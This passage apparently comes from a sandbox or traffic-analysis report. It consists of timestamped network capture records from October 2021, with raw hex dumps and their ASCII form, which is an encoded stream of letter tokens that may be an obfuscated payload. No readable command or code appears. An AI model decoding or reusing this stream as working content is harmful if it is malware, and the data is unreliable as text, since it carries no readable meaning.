                                                                                                Data Ascii: UT Tnn TTS UT nO TTp O MTO PS iU PS Pi pp TTi Mgp MgU ip PP Ti PT TnU MPP TTi TTn TSO TTM gp iU TgP TUT iO TTO ni TSU Tnp TPg iU PS Pi Ui TSS TTn TMU Mig Oi Pg TTi PP PM MMM TTn TSO TTM PS Pi iM TOn nU TnM TTn ip TTg TUM TPp PS Pi Ui TTi TO TTS TUO TUM U
                                                                                                2021-10-26 15:35:14 UTC5232INData Raw: 54 20 50 4d 20 4f 50 20 50 54 20 4d 4d 70 20 4d 67 4d 20 54 54 69 20 54 54 6e 20 54 53 4f 20 54 54 4d 20 50 54 20 69 55 20 54 53 70 20 54 6e 69 20 50 67 20 54 54 70 20 69 20 54 53 55 20 54 70 55 20 54 69 53 20 69 55 20 50 53 20 50 69 20 55 69 20 54 54 70 20 54 54 6e 20 54 70 50 20 4d 67 4d 20 4f 54 20 50 69 20 6e 53 20 50 50 20 4d 4d 53 20 4d 53 50 20 54 54 6e 20 54 53 4f 20 54 54 4d 20 50 53 20 69 4f 20 50 53 20 50 69 20 4d 53 50 20 4d 54 20 54 54 6e 20 4d 69 20 54 54 67 20 54 67 55 20 4d 69 53 20 50 53 20 50 69 20 55 69 20 54 54 69 20 54 54 50 20 54 53 4f 20 70 69 20 54 6e 54 20 55 6e 20 50 53 20 70 6e 20 55 50 20 54 50 53 20 54 55 53 20 54 53 4f 20 54 54 4d 20 50 53 20 69 55 20 50 54 20 50 69 20 4d 69 20 4d 67 50 20 4d 70 20 54 53 6e 20 50 20 50 54 20
                                                                                                Data Ascii: T PM OP PT MMp MgM TTi TTn TSO TTM PT iU TSp Tni Pg TTp i TSU TpU TiS iU PS Pi Ui TTp TTn TpP MgM OT Pi nS PP MMS MSP TTn TSO TTM PS iO PS Pi MSP MT TTn Mi TTg TgU MiS PS Pi Ui TTi TTP TSO pi TnT Un PS pn UP TPS TUS TSO TTM PS iU PT Pi Mi MgP Mp TSn P PT
                                                                                                2021-10-26 15:35:14 UTC5236INData Raw: 20 55 69 20 54 54 4d 20 50 53 20 69 4f 20 50 53 20 54 55 67 20 54 54 53 20 54 54 69 20 54 54 6e 20 54 53 55 20 54 54 4d 20 54 67 4f 20 54 53 20 50 53 20 50 69 20 55 70 20 54 54 69 20 54 70 53 20 55 6e 20 54 54 4d 20 50 53 20 69 4f 20 50 53 20 54 4d 67 20 54 53 70 20 54 54 69 20 54 54 6e 20 54 53 55 20 54 54 4d 20 54 6e 54 20 54 69 20 50 53 20 50 69 20 55 50 20 54 54 69 20 4f 70 20 55 4d 20 54 54 4d 20 50 53 20 69 4f 20 50 53 20 55 6e 20 54 53 6e 20 54 54 69 20 54 54 6e 20 54 53 55 20 54 54 4d 20 4d 67 4f 20 54 50 20 50 53 20 50 69 20 55 50 20 54 54 69 20 70 69 20 69 69 20 54 54 4d 20 50 53 20 50 53 20 50 53 20 54 53 67 20 4d 54 20 54 54 69 20 54 54 6e 20 54 54 53 20 54 54 4d 20 4f 50 20 54 54 67 20 50 53 20 50 69 20 55 50 20 54 54 69 20 4d 53 69 20 69 69
                                                                                                Data Ascii: Ui TTM PS iO PS TUg TTS TTi TTn TSU TTM TgO TS PS Pi Up TTi TpS Un TTM PS iO PS TMg TSp TTi TTn TSU TTM TnT Ti PS Pi UP TTi Op UM TTM PS iO PS Un TSn TTi TTn TSU TTM MgO TP PS Pi UP TTi pi ii TTM PS PS PS TSg MT TTi TTn TTS TTM OP TTg PS Pi UP TTi MSi ii
                                                                                                2021-10-26 15:35:14 UTC5240INData Raw: 54 54 4d 20 50 53 20 69 4f 20 50 53 20 55 67 20 67 55 20 54 54 69 20 54 54 6e 20 54 54 54 20 54 54 4d 20 54 6e 4f 20 70 70 20 50 53 20 50 69 20 55 50 20 54 54 69 20 54 55 55 20 67 53 20 54 54 4d 20 50 53 20 69 4f 20 50 53 20 50 50 20 67 4d 20 54 54 69 20 54 54 6e 20 54 53 55 20 54 54 4d 20 54 4d 6e 20 70 55 20 50 53 20 50 69 20 55 50 20 54 54 69 20 4d 69 53 20 4d 50 20 54 54 4d 20 50 53 20 50 53 20 50 53 20 54 50 54 20 67 4d 20 54 54 69 20 54 54 6e 20 54 54 53 20 54 54 4d 20 54 69 67 20 70 55 20 50 53 20 50 69 20 55 53 20 54 54 69 20 54 6e 4d 20 4d 50 20 54 54 4d 20 50 53 20 50 67 20 50 53 20 54 4f 50 20 67 4d 20 54 54 69 20 54 54 6e 20 54 53 55 20 54 54 4d 20 67 54 20 70 4f 20 50 53 20 50 69 20 55 50 20 54 54 69 20 54 4d 20 4d 69 20 54 54 4d 20 50 53 20
                                                                                                Data Ascii: TTM PS iO PS Ug gU TTi TTn TTT TTM TnO pp PS Pi UP TTi TUU gS TTM PS iO PS PP gM TTi TTn TSU TTM TMn pU PS Pi UP TTi MiS MP TTM PS PS PS TPT gM TTi TTn TTS TTM Tig pU PS Pi US TTi TnM MP TTM PS Pg PS TOP gM TTi TTn TSU TTM gT pO PS Pi UP TTi TM Mi TTM PS
                                                                                                2021-10-26 15:35:14 UTC5244INData Raw: 4d 20 54 69 67 20 50 54 20 4d 69 6e 20 55 69 20 54 69 69 20 70 4f 20 55 53 20 54 54 67 20 4d 69 67 20 69 55 20 4d 4d 53 20 70 20 54 50 4f 20 54 54 50 20 54 4f 70 20 54 53 4f 20 54 6e 70 20 54 70 20 54 6e 69 20 50 69 20 54 70 6e 20 55 69 20 54 4f 54 20 4d 69 54 20 54 53 20 54 54 4d 20 54 70 67 20 69 55 20 4d 67 54 20 54 6e 55 20 50 54 20 54 54 69 20 4d 4d 55 20 54 53 4f 20 54 6e 69 20 54 55 4d 20 55 6e 20 50 53 20 54 70 6e 20 55 69 20 54 67 53 20 4d 69 54 20 54 53 20 54 54 4d 20 54 70 67 20 69 55 20 69 55 20 54 6e 4f 20 50 54 20 54 54 69 20 67 70 20 54 53 69 20 54 67 54 20 69 53 20 55 6e 20 50 53 20 54 50 20 55 69 20 54 4d 4f 20 54 54 54 20 54 53 20 54 54 4d 20 4d 6e 20 69 4f 20 54 4f 67 20 69 69 20 69 70 20 54 54 6e 20 67 70 20 54 53 4f 20 54 67 54 20 69
                                                                                                Data Ascii: M Tig PT Min Ui Tii pO US TTg Mig iU MMS p TPO TTP TOp TSO Tnp Tp Tni Pi Tpn Ui TOT MiT TS TTM Tpg iU MgT TnU PT TTi MMU TSO Tni TUM Un PS Tpn Ui TgS MiT TS TTM Tpg iU iU TnO PT TTi gp TSi TgT iS Un PS TP Ui TMO TTT TS TTM Mn iO TOg ii ip TTn gp TSO TgT i
                                                                                                2021-10-26 15:35:14 UTC5248INData Raw: 6e 20 4d 4d 55 20 54 53 69 20 54 4d 67 20 54 50 4f 20 54 69 55 20 70 67 20 67 54 20 55 4d 20 4f 4f 20 4d 54 70 20 54 20 54 54 69 20 4d 50 54 20 69 4f 20 54 4f 67 20 69 69 20 55 54 20 54 54 50 20 54 4d 69 20 54 54 54 20 55 69 20 54 50 4f 20 4f 4d 20 69 55 20 4d 50 50 20 55 50 20 6e 50 20 4d 54 70 20 54 53 69 20 54 54 67 20 4d 50 54 20 69 4f 20 54 4d 69 20 54 50 50 20 55 54 20 54 54 50 20 54 55 53 20 54 53 55 20 67 4f 20 54 50 4f 20 54 67 53 20 70 67 20 4f 50 20 55 54 20 69 6e 20 4d 54 70 20 54 6e 69 20 54 4d 50 20 4f 54 20 50 67 20 55 69 20 54 50 50 20 54 50 6e 20 54 4d 6e 20 69 69 20 54 53 69 20 4d 67 6e 20 69 70 20 4d 50 50 20 70 67 20 54 54 54 20 55 54 20 4d 20 4d 54 70 20 54 55 54 20 54 4d 50 20 54 53 6e 20 50 67 20 6e 69 20 54 50 50 20 6e 50 20 54 54
                                                                                                Data Ascii: n MMU TSi TMg TPO TiU pg gT UM OO MTp T TTi MPT iO TOg ii UT TTP TMi TTT Ui TPO OM iU MPP UP nP MTp TSi TTg MPT iO TMi TPP UT TTP TUS TSU gO TPO TgS pg OP UT in MTp Tni TMP OT Pg Ui TPP TPn TMn ii TSi Mgn ip MPP pg TTT UT M MTp TUT TMP TSn Pg ni TPP nP TT
                                                                                                2021-10-26 15:35:14 UTC5252INData Raw: 53 6e 20 54 67 54 20 69 53 20 50 67 20 50 54 20 4d 54 50 20 55 70 20 4d 54 70 20 54 4f 70 20 54 54 53 20 54 54 70 20 4d 54 54 20 50 53 20 4d 69 50 20 54 50 70 20 55 6e 20 54 54 55 20 69 54 20 54 53 4f 20 67 70 20 54 50 67 20 55 6e 20 50 53 20 54 55 67 20 55 70 20 4d 53 4d 20 4d 4d 67 20 54 53 20 54 54 4d 20 4d 67 50 20 50 67 20 54 67 67 20 54 67 50 20 54 50 20 4f 6e 20 54 53 53 20 54 53 50 20 54 55 67 20 54 67 54 20 55 4d 20 67 67 20 69 6e 20 55 53 20 54 70 6e 20 54 4f 70 20 4d 53 50 20 54 54 4d 20 4d 67 50 20 50 67 20 54 6e 50 20 69 4d 20 70 54 20 4f 6e 20 54 55 55 20 54 53 4f 20 54 69 4d 20 54 50 69 20 70 69 20 67 67 20 4d 67 4f 20 55 54 20 54 69 4f 20 54 4f 70 20 4d 53 20 4f 4f 20 4f 69 20 69 55 20 4d 67 69 20 54 50 4f 20 54 54 53 20 54 4d 53 20 4d 50
                                                                                                Data Ascii: Sn TgT iS Pg PT MTP Up MTp TOp TTS TTp MTT PS MiP TPp Un TTU iT TSO gp TPg Un PS TUg Up MSM MMg TS TTM MgP Pg Tgg TgP TP On TSS TSP TUg TgT UM gg in US Tpn TOp MSP TTM MgP Pg TnP iM pT On TUU TSO TiM TPi pi gg MgO UT TiO TOp MS OO Oi iU Mgi TPO TTS TMS MP
                                                                                                2021-10-26 15:35:14 UTC5263INData Raw: 4f 50 20 6e 53 20 50 70 20 4d 6e 20 4d 53 20 67 20 69 20 54 54 50 20 70 55 20 6e 53 20 70 55 20 70 54 20 54 70 20 53 20 4d 50 20 4d 54 20 50 53 20 54 54 4f 20 55 6e 20 55 55 20 69 4f 20 53 20 4d 53 20 4d 50 20 4d 54 20 55 70 20 54 54 50 20 4f 67 20 55 4d 20 69 4f 20 50 54 20 54 20 4d 50 20 4d 20 4f 54 20 55 4d 20 6e 54 20 70 70 20 69 4f 20 54 54 69 20 67 55 20 4d 53 20 67 20 6e 53 20 55 50 20 4f 50 20 4d 69 20 4d 67 20 4d 4f 20 54 6e 20 55 20 50 4d 20 4f 67 20 4f 67 20 4d 55 20 54 54 6e 20 50 4f 20 67 54 20 50 20 69 20 4d 55 20 55 6e 20 70 70 20 50 53 20 54 54 69 20 70 54 20 54 6e 20 54 20 69 20 67 54 20 4f 4d 20 55 54 20 70 69 20 6e 4f 20 50 4d 20 70 69 20 54 54 6e 20 70 4d 20 4f 20 70 50 20 70 55 20 55 6e 20 4f 54 20 54 4d 4d 20 69 4f 20 4d 70 20 54 20
                                                                                                Data Ascii: OP nS Pp Mn MS g i TTP pU nS pU pT Tp S MP MT PS TTO Un UU iO S MS MP MT Up TTP Og UM iO PT T MP M OT UM nT pp iO TTi gU MS g nS UP OP Mi Mg MO Tn U PM Og Og MU TTn PO gT P i MU Un pp PS TTi pT Tn T i gT OM UT pi nO PM pi TTn pM O pP pU Un OT TMM iO Mp T
                                                                                                2021-10-26 15:35:14 UTC5279INData Raw: 70 20 6e 6e 20 54 50 20 69 55 20 54 6e 20 54 54 20 67 6e 20 69 53 20 50 54 20 50 4f 20 67 6e 20 4d 4d 20 54 53 4d 20 55 4f 20 54 4d 53 20 69 20 67 67 20 67 69 20 50 4d 20 4d 50 20 4f 54 20 4d 20 54 54 50 20 4f 70 20 50 20 4d 67 20 70 6e 20 54 69 20 6e 53 20 4f 50 20 6e 54 20 54 54 50 20 4f 4f 20 69 55 20 70 6e 20 70 4f 20 50 6e 20 4d 67 20 70 6e 20 4f 54 20 4f 69 20 6e 20 54 54 4d 20 50 6e 20 70 69 20 54 53 20 69 4d 20 6e 4d 20 4f 20 54 53 6e 20 54 54 20 55 69 20 55 54 20 6e 4d 20 4d 55 20 54 6e 20 54 54 20 54 4d 53 20 54 4d 50 20 4f 54 20 6e 20 53 20 70 4d 20 4f 53 20 4d 4f 20 55 55 20 70 55 20 67 20 54 53 55 20 69 69 20 67 70 20 67 4f 20 67 20 54 4f 20 54 54 67 20 55 6e 20 54 54 70 20 55 4f 20 67 53 20 67 4f 20 50 4d 20 4f 54 20 70 4d 20 54 20 54 54 70
                                                                                                Data Ascii: p nn TP iU Tn TT gn iS PT PO gn MM TSM UO TMS i gg gi PM MP OT M TTP Op P Mg pn Ti nS OP nT TTP OO iU pn pO Pn Mg pn OT Oi n TTM Pn pi TS iM nM O TSn TT Ui UT nM MU Tn TT TMS TMP OT n S pM OS MO UU pU g TSU ii gp gO g TO TTg Un TTp UO gS gO PM OT pM T TTp
                                                                                                2021-10-26 15:35:14 UTC5295INData Raw: 67 20 50 54 20 4f 53 20 6e 20 54 50 20 54 67 20 50 53 20 4d 54 20 54 53 50 20 67 20 70 4d 20 4f 20 69 4d 20 54 4d 54 20 55 6e 20 6e 50 20 54 54 4f 20 67 6e 20 70 4d 20 69 4d 20 69 20 67 4d 20 4d 20 54 54 4f 20 54 53 67 20 54 53 54 20 67 53 20 4d 50 20 69 50 20 55 20 67 4d 20 70 4f 20 54 67 20 54 50 20 50 69 20 54 54 4f 20 6e 4f 20 69 20 55 20 70 4f 20 70 6e 20 70 70 20 54 53 54 20 55 6e 20 50 50 20 67 50 20 69 50 20 69 4d 20 70 20 54 54 20 55 6e 20 4d 20 54 53 4d 20 4f 6e 20 50 69 20 69 4d 20 53 20 67 69 20 6e 54 20 4f 6e 20 54 50 20 54 54 20 55 69 20 55 54 20 6e 4d 20 4d 55 20 4d 67 20 4f 6e 20 54 4d 53 20 70 6e 20 54 4d 54 20 54 54 20 50 6e 20 50 6e 20 67 6e 20 67 69 20 54 54 50 20 4f 55 20 54 54 70 20 55 54 20 4f 4f 20 70 70 20 67 55 20 69 4d 20 67 53
                                                                                                Data Ascii: g PT OS n TP Tg PS MT TSP g pM O iM TMT Un nP TTO gn pM iM i gM M TTO TSg TST gS MP iP U gM pO Tg TP Pi TTO nO i U pO pn pp TST Un PP gP iP iM p TT Un M TSM On Pi iM S gi nT On TP TT Ui UT nM MU Mg On TMS pn TMT TT Pn Pn gn gi TTP OU TTp UT OO pp gU iM gS
                                                                                                2021-10-26 15:35:14 UTC5311INData Raw: 53 20 54 54 6e 20 4f 67 20 55 50 20 55 55 20 54 67 20 4d 20 70 4d 20 4f 53 20 67 4d 20 54 4d 69 20 54 54 4f 20 55 50 20 54 54 20 54 53 50 20 54 54 69 20 55 70 20 55 53 20 54 20 70 20 70 70 20 54 53 69 20 54 4d 69 20 54 6e 20 69 55 20 67 55 20 70 67 20 50 69 20 54 4d 69 20 4f 67 20 69 20 54 53 4d 20 54 67 20 70 54 20 70 54 20 4f 53 20 70 4d 20 54 4d 50 20 54 4d 69 20 54 53 67 20 55 54 20 54 53 50 20 6e 4f 20 54 54 6e 20 6e 55 20 6e 6e 20 70 6e 20 54 4d 4d 20 70 6e 20 4f 67 20 70 4d 20 4d 20 6e 70 20 54 53 20 6e 67 20 69 20 6e 67 20 4f 67 20 6e 55 20 67 70 20 70 53 20 67 55 20 4f 50 20 50 67 20 4d 4d 20 54 54 69 20 54 54 67 20 70 20 54 53 53 20 50 4d 20 70 4d 20 54 20 4d 54 20 6e 53 20 4f 50 20 50 20 55 4d 20 54 69 20 4d 53 20 50 4f 20 55 69 20 70 4d 20 6e
                                                                                                Data Ascii: S TTn Og UP UU Tg M pM OS gM TMi TTO UP TT TSP TTi Up US T p pp TSi TMi Tn iU gU pg Pi TMi Og i TSM Tg pT pT OS pM TMP TMi TSg UT TSP nO TTn nU nn pn TMM pn Og pM M np TS ng i ng Og nU gp pS gU OP Pg MM TTi TTg p TSS PM pM T MT nS OP P UM Ti MS PO Ui pM n
                                                                                                2021-10-26 15:35:14 UTC5327INData Raw: 67 20 4d 50 20 54 4d 4d 20 4f 50 20 54 54 50 20 54 54 20 54 53 50 20 54 54 69 20 55 70 20 55 53 20 54 20 55 6e 20 54 54 6e 20 54 20 54 53 54 20 54 54 4d 20 4d 50 20 54 6e 20 4d 54 20 6e 67 20 4f 70 20 53 20 70 50 20 6e 20 54 53 53 20 67 4f 20 6e 70 20 69 4d 20 54 53 20 6e 4d 20 55 67 20 54 54 70 20 70 50 20 54 53 50 20 6e 4f 20 54 54 6e 20 6e 55 20 6e 6e 20 70 6e 20 55 67 20 54 54 55 20 55 54 20 54 6e 20 70 4f 20 50 20 53 20 67 67 20 70 55 20 70 20 4f 4d 20 4f 50 20 70 54 20 53 20 70 4d 20 4d 54 20 50 69 20 4f 70 20 54 4d 50 20 55 55 20 54 20 50 20 6e 4f 20 6e 4d 20 54 53 4f 20 55 67 20 54 50 20 70 50 20 55 70 20 70 50 20 4f 6e 20 67 50 20 50 50 20 4d 20 69 53 20 54 53 70 20 55 20 54 54 70 20 54 53 53 20 54 53 53 20 70 4d 20 6e 20 70 20 4d 70 20 4f 53 20
                                                                                                Data Ascii: g MP TMM OP TTP TT TSP TTi Up US T Un TTn T TST TTM MP Tn MT ng Op S pP n TSS gO np iM TS nM Ug TTp pP TSP nO TTn nU nn pn Ug TTU UT Tn pO P S gg pU p OM OP pT S pM MT Pi Op TMP UU T P nO nM TSO Ug TP pP Up pP On gP PP M iS TSp U TTp TSS TSS pM n p Mp OS
                                                                                                2021-10-26 15:35:14 UTC5343INData Raw: 54 54 70 20 54 53 4f 20 70 20 70 70 20 4d 55 20 50 50 20 67 20 55 4d 20 54 20 54 53 67 20 54 20 67 20 50 53 20 50 6e 20 69 54 20 55 6e 20 54 53 53 20 4f 69 20 4f 54 20 50 20 50 4f 20 70 4d 20 4d 54 20 54 20 54 53 6e 20 54 67 20 50 53 20 4d 54 20 54 53 50 20 67 20 50 54 20 50 50 20 70 53 20 54 54 55 20 70 55 20 54 4d 70 20 4f 6e 20 69 55 20 67 4f 20 50 55 20 67 50 20 69 54 20 70 20 54 54 69 20 54 53 4f 20 55 54 20 54 20 69 50 20 67 54 20 6e 20 50 55 20 4f 54 20 69 20 54 54 4d 20 55 54 20 54 55 20 50 54 20 50 4f 20 54 69 20 67 69 20 54 4d 70 20 4f 70 20 54 4d 6e 20 70 6e 20 67 20 6e 20 67 70 20 67 70 20 70 4d 20 55 70 20 4f 55 20 54 4d 70 20 55 50 20 54 53 50 20 54 54 69 20 55 70 20 55 53 20 54 20 70 50 20 54 20 55 67 20 54 54 70 20 4f 55 20 6e 54 20 50 53
                                                                                                Data Ascii: TTp TSO p pp MU PP g UM T TSg T g PS Pn iT Un TSS Oi OT P PO pM MT T TSn Tg PS MT TSP g PT PP pS TTU pU TMp On iU gO PU gP iT p TTi TSO UT T iP gT n PU OT i TTM UT TU PT PO Ti gi TMp Op TMn pn g n gp gp pM Up OU TMp UP TSP TTi Up US T pP T Ug TTp OU nT PS
                                                                                                2021-10-26 15:35:14 UTC5359INData Raw: 70 20 4f 54 20 70 50 20 54 4d 6e 20 54 53 50 20 54 54 69 20 55 70 20 55 53 20 54 20 6e 20 4f 67 20 54 54 6e 20 54 4d 50 20 54 53 4f 20 54 20 53 20 69 70 20 50 6e 20 4f 54 20 54 53 54 20 54 54 55 20 54 53 55 20 50 54 20 67 67 20 69 4d 20 50 4d 20 67 50 20 70 69 20 4f 4f 20 4f 4f 20 55 54 20 54 53 50 20 6e 4f 20 54 54 6e 20 6e 55 20 6e 6e 20 70 6e 20 70 20 54 4d 50 20 6e 54 20 67 53 20 67 69 20 4d 4f 20 69 69 20 70 4d 20 70 55 20 54 53 50 20 55 69 20 4f 67 20 69 55 20 54 6e 20 70 69 20 4d 69 20 4d 69 20 54 53 4f 20 54 4d 54 20 54 4d 54 20 70 4f 20 54 20 54 70 20 50 6e 20 4d 20 50 6e 20 70 20 6e 69 20 54 53 53 20 54 54 4d 20 4d 67 20 54 53 20 70 20 55 4f 20 4d 4d 20 70 70 20 70 4f 20 50 20 4f 70 20 69 69 20 53 20 69 4d 20 50 70 20 6e 6e 20 50 53 20 54 4f 20
                                                                                                Data Ascii: p OT pP TMn TSP TTi Up US T n Og TTn TMP TSO T S ip Pn OT TST TTU TSU PT gg iM PM gP pi OO OO UT TSP nO TTn nU nn pn p TMP nT gS gi MO ii pM pU TSP Ui Og iU Tn pi Mi Mi TSO TMT TMT pO T Tp Pn M Pn p ni TSS TTM Mg TS p UO MM pp pO P Op ii S iM Pp nn PS TO
                                                                                                2021-10-26 15:35:14 UTC5375INData Raw: 20 69 53 20 67 70 20 55 53 20 6e 6e 20 50 53 20 54 4f 20 54 50 20 6e 54 20 50 70 20 6e 20 69 69 20 67 50 20 53 20 70 20 67 20 55 54 20 70 50 20 50 70 20 50 54 20 4d 4f 20 55 69 20 4f 20 54 4d 70 20 55 69 20 54 4d 70 20 54 53 55 20 50 4f 20 67 53 20 69 4f 20 4d 70 20 6e 6e 20 54 50 20 69 55 20 54 6e 20 54 54 20 67 6e 20 67 69 20 69 69 20 4d 50 20 50 67 20 70 4f 20 55 6e 20 67 20 54 54 70 20 54 69 20 4d 50 20 70 69 20 4d 50 20 67 4d 20 54 54 20 54 4d 67 20 54 4d 54 20 54 4d 53 20 50 70 20 55 70 20 6e 53 20 4f 54 20 69 20 70 6e 20 54 4d 54 20 55 70 20 4f 6e 20 70 54 20 67 53 20 69 20 6e 20 4d 54 20 54 53 54 20 55 67 20 70 70 20 4f 6e 20 67 54 20 70 4d 20 6e 54 20 50 50 20 55 20 4f 4d 20 70 4f 20 55 50 20 54 54 20 55 69 20 55 54 20 6e 4d 20 4d 55 20 50 53 20
                                                                                                Data Ascii: iS gp US nn PS TO TP nT Pp n ii gP S p g UT pP Pp PT MO Ui O TMp Ui TMp TSU PO gS iO Mp nn TP iU Tn TT gn gi ii MP Pg pO Un g TTp Ti MP pi MP gM TT TMg TMT TMS Pp Up nS OT i pn TMT Up On pT gS i n MT TST Ug pp On gT pM nT PP U OM pO UP TT Ui UT nM MU PS
                                                                                                2021-10-26 15:35:14 UTC5391INData Raw: 6e 20 50 53 20 54 54 6e 20 50 4f 20 67 54 20 50 20 54 4d 20 4d 20 55 6e 20 69 55 20 54 54 6e 20 55 67 20 67 4d 20 50 4d 20 4d 70 20 54 20 4d 53 20 55 6e 20 70 70 20 4f 55 20 55 6e 20 67 4d 20 4d 70 20 54 54 6e 20 69 4d 20 4d 54 20 6e 53 20 54 54 55 20 4f 54 20 4f 53 20 69 4f 20 54 20 54 54 6e 20 69 4d 20 4d 54 20 6e 53 20 54 54 55 20 4f 54 20 4f 53 20 69 4f 20 70 53 20 4d 53 20 53 20 4d 54 20 54 53 54 20 55 4f 20 6e 53 20 4f 69 20 50 4f 20 6e 20 54 20 69 53 20 55 20 6e 53 20 55 50 20 4f 4d 20 70 4f 20 70 54 20 4d 4f 20 4d 6e 20 54 53 4f 20 50 67 20 4f 4d 20 70 50 20 6e 54 20 55 67 20 67 67 20 4d 67 20 54 54 6e 20 70 67 20 4d 54 20 55 67 20 55 69 20 54 4d 67 20 55 55 20 67 4d 20 70 50 20 6e 54 20 54 53 4f 20 67 69 20 55 6e 20 55 54 20 55 70 20 54 54 70 20
                                                                                                Data Ascii: n PS TTn PO gT P TM M Un iU TTn Ug gM PM Mp T MS Un pp OU Un gM Mp TTn iM MT nS TTU OT OS iO T TTn iM MT nS TTU OT OS iO pS MS S MT TST UO nS Oi PO n T iS U nS UP OM pO pT MO Mn TSO Pg OM pP nT Ug gg Mg TTn pg MT Ug Ui TMg UU gM pP nT TSO gi Un UT Up TTp
                                                                                                2021-10-26 15:35:14 UTC5407INData Raw: 70 69 20 54 53 50 20 54 54 4d 20 50 53 20 67 69 20 4f 54 20 69 55 20 54 54 70 20 54 54 50 20 54 54 70 20 54 4d 6e 20 4d 69 67 20 50 50 20 50 69 20 54 55 20 50 50 20 55 50 20 4f 70 20 4d 69 6e 20 54 54 70 20 54 54 55 20 67 4f 20 67 69 20 54 6e 55 20 54 50 4f 20 55 50 20 54 4d 69 20 54 4d 6e 20 54 4d 53 20 4f 55 20 54 6e 55 20 54 70 4f 20 69 55 20 67 4f 20 4d 54 67 20 55 67 20 54 53 53 20 69 50 20 54 54 6e 20 50 67 20 69 4f 20 67 50 20 54 55 4d 20 4d 69 53 20 54 54 4f 20 54 54 6e 20 54 53 4f 20 4f 55 20 54 6e 4f 20 4d 50 67 20 50 50 20 4d 4d 20 55 69 20 4f 70 20 4d 69 70 20 4f 70 20 4f 70 20 50 67 20 50 53 20 67 4f 20 67 4f 20 4d 54 4d 20 4d 54 50 20 54 54 4f 20 4f 4f 20 54 53 55 20 67 4f 20 67 67 20 54 6e 55 20 54 6e 54 20 55 70 20 54 4d 69 20 54 53 50 20
                                                                                                Data Ascii: pi TSP TTM PS gi OT iU TTp TTP TTp TMn Mig PP Pi TU PP UP Op Min TTp TTU gO gi TnU TPO UP TMi TMn TMS OU TnU TpO iU gO MTg Ug TSS iP TTn Pg iO gP TUM MiS TTO TTn TSO OU TnO MPg PP MM Ui Op Mip Op Op Pg PS gO gO MTM MTP TTO OO TSU gO gg TnU TnT Up TMi TSP
                                                                                                2021-10-26 15:35:14 UTC5423INData Raw: 55 20 4d 53 4d 20 54 4f 53 20 54 69 4f 20 4d 54 20 4d 50 54 20 54 20 54 69 54 20 54 50 54 20 67 53 20 55 53 20 54 54 20 54 53 6e 20 54 4d 69 20 4d 53 4d 20 67 70 20 67 4f 20 70 53 20 6e 67 20 54 4f 67 20 54 67 67 20 54 69 67 20 54 4d 55 20 54 67 4f 20 4d 54 4d 20 54 6e 53 20 70 20 4d 67 69 20 54 53 6e 20 69 53 20 4d 67 4f 20 69 70 20 70 50 20 4d 54 69 20 4f 70 20 4d 67 67 20 54 4f 50 20 54 50 4d 20 70 50 20 69 55 20 4d 69 70 20 54 50 6e 20 54 69 67 20 54 4d 55 20 54 6e 54 20 4f 70 20 4d 50 69 20 54 6e 53 20 54 67 4f 20 4d 54 55 20 4d 69 20 54 4d 4f 20 4d 50 50 20 4d 53 20 55 4d 20 50 54 20 54 69 55 20 54 69 20 54 55 4d 20 67 6e 20 6e 69 20 54 55 54 20 4d 53 54 20 6e 6e 20 4d 54 6e 20 54 53 4d 20 55 4f 20 54 54 20 69 69 20 69 70 20 50 67 20 50 20 4d 4d 70
                                                                                                Data Ascii: U MSM TOS TiO MT MPT T TiT TPT gS US TT TSn TMi MSM gp gO pS ng TOg Tgg Tig TMU TgO MTM TnS p Mgi TSn iS MgO ip pP MTi Op Mgg TOP TPM pP iU Mip TPn Tig TMU TnT Op MPi TnS TgO MTU Mi TMO MPP MS UM PT TiU Ti TUM gn ni TUT MST nn MTn TSM UO TT ii ip Pg P MMp
                                                                                                2021-10-26 15:35:14 UTC5439INData Raw: 53 50 20 4d 69 67 20 4d 67 54 20 6e 54 20 54 70 50 20 4d 53 6e 20 54 6e 67 20 54 54 4d 20 54 4f 4d 20 54 54 54 20 4d 54 69 20 70 70 20 55 54 20 4d 4d 20 54 67 6e 20 6e 53 20 4d 54 53 20 54 67 50 20 6e 67 20 4d 53 53 20 54 69 53 20 54 55 4d 20 54 53 4f 20 4d 4d 67 20 4d 67 54 20 54 69 6e 20 67 55 20 4d 67 20 54 69 70 20 4d 50 67 20 4d 4d 70 20 4d 4d 20 54 67 69 20 4d 54 67 20 54 4f 67 20 54 69 20 54 50 20 70 67 20 70 69 20 69 6e 20 54 50 50 20 54 54 4d 20 54 53 4f 20 54 53 50 20 54 4d 6e 20 4d 69 6e 20 54 50 55 20 54 54 55 20 54 54 53 20 4d 50 53 20 54 69 69 20 54 4d 69 20 54 20 54 4d 54 20 50 54 20 54 6e 4f 20 55 4f 20 55 54 20 4d 69 53 20 4d 53 54 20 67 53 20 54 70 20 54 6e 4f 20 55 55 20 69 70 20 4d 69 55 20 50 69 20 4f 55 20 4d 53 69 20 54 55 70 20 4f
                                                                                                Data Ascii: SP Mig MgT nT TpP MSn Tng TTM TOM TTT MTi pp UT MM Tgn nS MTS TgP ng MSS TiS TUM TSO MMg MgT Tin gU Mg Tip MPg MMp MM Tgi MTg TOg Ti TP pg pi in TPP TTM TSO TSP TMn Min TPU TTU TTS MPS Tii TMi T TMT PT TnO UO UT MiS MST gS Tp TnO UU ip MiU Pi OU MSi TUp O
                                                                                                2021-10-26 15:35:14 UTC5455INData Raw: 55 20 54 4f 67 20 4d 4d 55 20 4d 54 4f 20 67 53 20 4d 67 50 20 54 53 53 20 70 50 20 67 4d 20 55 4f 20 54 4f 53 20 54 4f 54 20 54 53 4f 20 4d 53 4f 20 4d 69 67 20 4d 69 54 20 54 4d 50 20 54 6e 70 20 54 4d 67 20 54 69 55 20 54 53 50 20 54 4f 6e 20 54 67 4d 20 4f 20 54 53 4f 20 54 53 69 20 54 6e 20 54 6e 50 20 4d 67 69 20 67 67 20 54 50 6e 20 54 70 4d 20 54 4f 67 20 54 69 4f 20 4d 50 4d 20 54 4f 4f 20 54 67 53 20 54 4f 4d 20 54 70 4d 20 54 4f 20 69 50 20 4d 55 20 54 69 70 20 54 6e 20 55 4f 20 54 6e 50 20 54 4d 4d 20 67 70 20 54 4f 54 20 4d 4d 55 20 6e 20 54 6e 53 20 4d 54 54 20 4d 53 50 20 4d 69 54 20 4d 55 20 4d 54 55 20 4f 69 20 50 55 20 54 53 4f 20 54 50 53 20 4f 69 20 54 6e 6e 20 55 67 20 4d 69 54 20 50 70 20 4d 53 4f 20 6e 67 20 54 50 70 20 54 67 70 20
